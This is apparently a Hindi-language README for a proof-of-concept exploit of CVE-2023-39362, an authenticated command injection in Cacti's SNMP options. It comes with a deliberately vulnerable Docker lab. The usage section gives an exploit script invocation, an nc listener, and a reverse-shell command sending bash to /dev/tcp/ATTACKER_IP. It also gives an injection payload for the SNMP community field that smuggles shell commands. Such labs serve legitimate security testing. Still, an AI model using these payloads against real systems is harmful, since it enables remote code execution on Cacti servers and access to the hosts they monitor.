
सीवीई-2023-39362 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कैक्टी के एसएनएमपी विकल्पों में एक प्रमाणित कमांड इंजेक्शन। इसमें परीक्षण के लिए एक कमजोर डॉकर वातावरण और रिवर्स शेल क्षमता के साथ स्वचालित शोषण के लिए एक पायथन स्क्रिप्ट शामिल है।
यह रेपो इस रेपो से फोर्क किया गया है: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Cacti एक ओपन-सोर्स परिचालन निगरानी और दोष प्रबंधन फ्रेमवर्क है, जो अपने उपयोगकर्ता समुदाय की गतिशील आवश्यकताओं को पूरा करने के लिए लगातार विकसित हो रहा है।
संस्करण 1.2.24 में, CVE-2023-39362 के रूप में चिह्नित एक संभावित सुरक्षा कमजोरी की पहचान की गई है। विशिष्ट परिस्थितियों में, एक प्रमाणित विशेषाधिकार प्राप्त उपयोगकर्ता एक डिवाइस के SNMP विकल्पों में एक दोष का शोषण कर सकता है, एक दुर्भावनापूर्ण स्ट्रिंग का उपयोग करके जो कमांड इंजेक्शन की ओर ले जाती है। यह शोषण अंतर्निहित सर्वर पर प्रमाणित दूरस्थ कोड निष्पादन का परिणाम है।
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
इस कमजोरी के प्रभाव गंभीर हैं, क्योंकि प्रमाणित विशेषाधिकारों वाला एक दुर्भावनापूर्ण अभिनेता Cacti होस्ट करने वाले सर्वर की अखंडता से समझौता कर सकता है। यह समझौता संभावित रूप से नेटवर्क के भीतर अन्य होस्टों, विशेष रूप से Cacti द्वारा निगरानी किए जाने वाले होस्टों तक अनधिकृत पहुंच के प्रवेश द्वार के रूप में काम कर सकता है।
यह Cacti कमजोरी (CVE-2023-39362) के लिए शोषण का परीक्षण करने के लिए एक कमजोर अनुप्रयोग है।
इस एप्लिकेशन में गंभीर सुरक्षा कमजोरियाँ हैं। इसे अपने जोखिम पर चलाएँ! बैकअप और संरक्षित वातावरण (जैसे हाल ही के स्नैपशॉट और होस्ट-ओनली नेटवर्किंग वाला VM) का उपयोग करने की अनुशंसा की जाती है। इस एप्लिकेशन को किसी भी इंटरनेट-फेसिंग सर्वर पर अपलोड न करें, क्योंकि वे समझौता हो जाएंगे।
मैं इस एप्लिकेशन का उपयोग करने के तरीके की जिम्मेदारी नहीं लेता। इस एप्लिकेशन का एकमात्र उद्देश्य CVE-2023-39362 शोषण के लिए एक परीक्षण परिदृश्य होना है और इसका दुर्भावनापूर्ण उपयोग नहीं किया जाना चाहिए। यदि इस एप्लिकेशन की स्थापना के माध्यम से आपका सर्वर समझौता किया जाता है, तो यह मेरी जिम्मेदारी नहीं है, यह उस व्यक्ति (व्यक्तियों) की जिम्मेदारी है जिसने इसे अपलोड और स्थापित किया।**
यहाँ वातावरण सेटअप करने के चरण दिए गए हैं:
docker compose up -d चलाएँ।admin/admin हैं।admin के रूप में लॉग इन करें।guest उपयोगकर्ता पर क्लिक करें।guest के रूप में पुनः लॉगिन करें।Cacti की आधिकारिक स्थापना मार्गदर्शिका यहाँ पाई जा सकती है।
वातावरण को टियरडाउन करने के लिए docker compose down कमांड का उपयोग करें।
(यह शोषण का केवल एक संभावित मार्ग है)
दूरस्थ सर्वर पर कमांड चलाएँ:
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof
रिवर्स शेल खोलना:
nc -lvnp 4242
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'
public\' ; touch /tmp/proof ; \'।/tmp के अंतर्गत बनाई गई फ़ाइल की उपस्थिति की जाँच करें।रिवर्स शेल प्राप्त करने के लिए, निम्नलिखित जैसे पेलोड का उपयोग किया जा सकता है।
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
कमजोरी का विस्तृत मूल कारण मूल सुरक्षा सलाहकार या मूल लेखक के ब्लॉग पोस्ट पर उपलब्ध है।
यह परियोजना Unlicense के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।